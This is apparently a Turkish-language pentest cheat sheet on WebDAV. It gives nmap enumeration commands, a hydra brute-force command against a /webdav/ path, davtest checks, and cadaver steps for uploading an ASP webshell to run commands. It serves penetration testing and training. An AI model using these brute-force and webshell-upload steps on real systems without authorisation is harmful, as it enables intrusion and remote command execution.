WEBDAV
Belirtilen yolda kullanılabilecek metodları listeler.
nmap --script http-methods --script-args http-methods.url-path=/webdav/ <IP>Webdav dizini varsa bilgilerini listeler.
nmap --script http-webdav-scan --script-args http-methods.url-path=/webdav/ <IP>Eğer dizinlerin arasında webdav var ise aşağıdaki komut ile giriş yapmayı deneyebiliriz.
davtest -url http://example.com/webdavBrute Force
Giriş yapmak için brute-force saldırısı yapabiliriz.
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt <IP> http-get /webdav/Giriş bilgilerini bulduktan sonra aşağıdaki komut ile giriş yapabiliriz.
davtest -auth admin:password123 -url http://example.com/webdavKomut Çalıştırma
Webdav dizinine dosya yüklemek için cadaver aracını kullanıyoruz.
cadaver http://example.com/webdav
put /usr/share/webshells/asp/webshell.asp
Bir webshell yükledikten sonra istediğimiz komutu çalıştırabiliriz.
Aynı işlemi msfconsole ile de yapabiliriz.
Last updated